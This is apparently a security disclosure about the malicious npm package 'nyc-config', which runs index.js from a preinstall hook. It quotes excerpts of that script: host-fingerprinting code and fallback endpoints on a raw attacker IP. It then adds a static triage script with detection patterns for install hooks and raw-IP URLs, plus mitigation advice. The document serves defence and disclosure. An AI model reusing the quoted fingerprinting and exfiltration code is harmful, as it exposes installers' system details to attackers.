Our system just picked up a malicious package published to npm named [email protected]. The name and versioning of the package indicate a possible dependency confusion attack.
Automated analysis:
https://platform.safedep.io/community/malysis/01JP01T1WQPNGAG516NDS9A6ST
Package info:
https://www.npmjs.com/package/nyc-config
package.json contains a preinstall directive to execute index.js on installation.
Example malicious code in nyc-config/index.js:
```js
// index.js is executed by the package's preinstall hook; it needs the os module
// for the host fingerprinting below.
const os = require("os");

// List of fallback servers
const endpoints = [
  "http://23.22.251.177:8080/jpd.php",
  "http://23.22.251.177:8080/jpd1.php",
];

// [...]

// Collect System Information
const systemInfo = {
  publicIP: "", // Will be fetched dynamically
  hostname: os.hostname(),
  osType: os.type(),
  osPlatform: os.platform(),
  osRelease: os.release(),
  osArch: os.arch(),
  localIP:
    Object.values(os.networkInterfaces())
      .flat()
      .find((i) => i.family === "IPv4" && !i.internal)?.address || "Unknown",
  whoamiUser: os.userInfo().username,
  currentDirectory: process.cwd(),
};
```
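The pattern in the report is an install-time lifecycle hook whose script embeds hard-coded raw-IP endpoints and fingerprints the host with the os module. Below is an added example of a static triage for an unpacked npm tarball that checks for exactly that; it is not code from the issue, the package, or SafeDep's analysis. The package.json and index.js contents it runs on are constructed to resemble the snippet above, and the "clean/review/high" verdict rules are this example's own heuristic, not a rule from the report.

```javascript
"use strict";

// Lifecycle scripts that npm runs on its own during `npm install`.
const INSTALL_HOOKS = ["preinstall", "install", "postinstall", "prepare"];

// os.* calls the reported index.js used to fingerprint the host.
const FINGERPRINT_CALLS = [
  "os.hostname", "os.type", "os.platform", "os.release",
  "os.arch", "os.networkInterfaces", "os.userInfo",
];

// http(s) URL whose host is a bare IPv4 literal, like the fallback servers above.
const RAW_IP_URL_RE = /https?:\/\/\d{1,3}(?:\.\d{1,3}){3}(?::\d{1,5})?(?:\/[^\s"'`,\]]*)?/g;

// Install-time hooks declared in a parsed package.json.
function findInstallHooks(pkgJson) {
  const scripts = pkgJson && pkgJson.scripts && typeof pkgJson.scripts === "object"
    ? pkgJson.scripts : {};
  return INSTALL_HOOKS
    .filter((hook) => typeof scripts[hook] === "string")
    .map((hook) => ({ hook, command: scripts[hook] }));
}

// The .js file a hook command hands to node ("node index.js" -> "index.js"), or null.
function scriptTarget(command) {
  const m = /\bnode\s+(\S+\.[cm]?js)\b/.exec(command);
  return m ? m[1].replace(/^\.\//, "") : null;
}

// Static indicators found in one source file.
function scanSource(source) {
  return {
    rawIpEndpoints: [...source.matchAll(RAW_IP_URL_RE)].map((m) => m[0]),
    fingerprinting: FINGERPRINT_CALLS.filter((call) => source.includes(call + "(")),
  };
}

// Heuristic verdict (an assumption of this example, not a SafeDep rule):
//   clean  - no install-time hook at all
//   review - a hook exists but its script shows neither indicator
//   high   - a hook's script embeds a raw-IP endpoint and fingerprints the host
function triagePackage(pkgJson, files) {
  const findings = findInstallHooks(pkgJson).map(({ hook, command }) => {
    const target = scriptTarget(command);
    const source = target && typeof files[target] === "string" ? files[target] : "";
    return { hook, command, target, ...scanSource(source) };
  });
  const high = findings.some((f) => f.rawIpEndpoints.length > 0 && f.fingerprinting.length > 0);
  const verdict = high ? "high" : findings.length > 0 ? "review" : "clean";
  return { verdict, findings };
}

// Constructed sample modelled on the snippet in the report; not the real tarball.
const SAMPLE_PKG = { name: "nyc-config", scripts: { preinstall: "node index.js" } };
const SAMPLE_FILES = {
  "index.js": [
    'const os = require("os");',
    'const endpoints = ["http://23.22.251.177:8080/jpd.php", "http://23.22.251.177:8080/jpd1.php"];',
    'const systemInfo = { hostname: os.hostname(), whoamiUser: os.userInfo().username };',
  ].join("\n"),
};

console.log(JSON.stringify(triagePackage(SAMPLE_PKG, SAMPLE_FILES), null, 2));

if (typeof module !== "undefined") {
  module.exports = { findInstallHooks, scriptTarget, scanSource, triagePackage, SAMPLE_PKG, SAMPLE_FILES };
}
```

Run it with `node` against the package.json and entry script of an unpacked tarball. A hook on its own is only a reason to look (many native modules legitimately run `node-gyp rebuild` on install); the combination of a hook, a raw-IP endpoint and host fingerprinting is the exfiltration shape this report describes. Independently of any scanner, `npm install --ignore-scripts` (or `ignore-scripts=true` in .npmrc) stops preinstall hooks like this one from running at all.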
arunanshub